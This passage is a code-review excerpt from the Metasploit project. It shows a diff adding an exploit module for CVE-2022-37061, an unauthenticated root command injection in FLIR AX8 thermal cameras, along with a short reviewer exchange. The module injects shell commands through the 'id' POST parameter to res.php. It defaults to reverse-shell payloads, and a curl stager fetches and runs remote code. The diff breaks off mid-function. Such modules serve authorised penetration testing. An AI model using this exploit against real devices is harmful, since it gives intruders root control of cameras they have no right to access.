modules/exploits/linux/http/flir_ax8_unauth_rce_cve_2022_37061.rb

```diff
@@ -0,0 +1,123 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/stopwatch'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'FLIR AX8 unauthenticated RCE',
+        'Description' => %q{
+          All FLIR AX8 thermal sensor cameras version up to and including 1.46.16 are vulnerable to Remote Command Injection.
+          This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter
+          in the res.php endpoint.
+
+          This module uses the vulnerability to upload and execute payloads gaining root privileges.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Thomas Knudsen (https://www.linkedin.com/in/thomasjknudsen)', # Security researcher
+          'Samy Younsi (https://www.linkedin.com/in/samy-younsi)', # Security researcher
+          'h00die-gr3y' # metasploit module
+        ],
+        'References' => [
+          ['CVE', '2022-37061'],
+          ['PACKETSTORM', '168114'],
+          ['URL', 'https://attackerkb.com/topics/UAZaDsQBfx/cve-2022-37061'],
+        ],
+        'DisclosureDate' => '2022-08-19',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_ARMLE],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_netcat'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_ARMLE],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'curl', 'printf' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 80,
+          'SSL' => false
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+  end
+
+  def execute_command(cmd, _opts = {})
+    return send_request_cgi({
+      'method' => 'POST',
+      'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
+      'uri' => normalize_uri(target_uri.path, 'res.php'),
+      'vars_post' => {
+        'action' => 'alarm',
+        'id' => "2;#{cmd}"
```

Comment:
Can the number be randomized?

Reply:
Fixed. See [3e78229](https://github.com/rapid7/metasploit-framework/pull/17174/commits/3e78229fc000844bb28a8ab1822d307c3632abdb)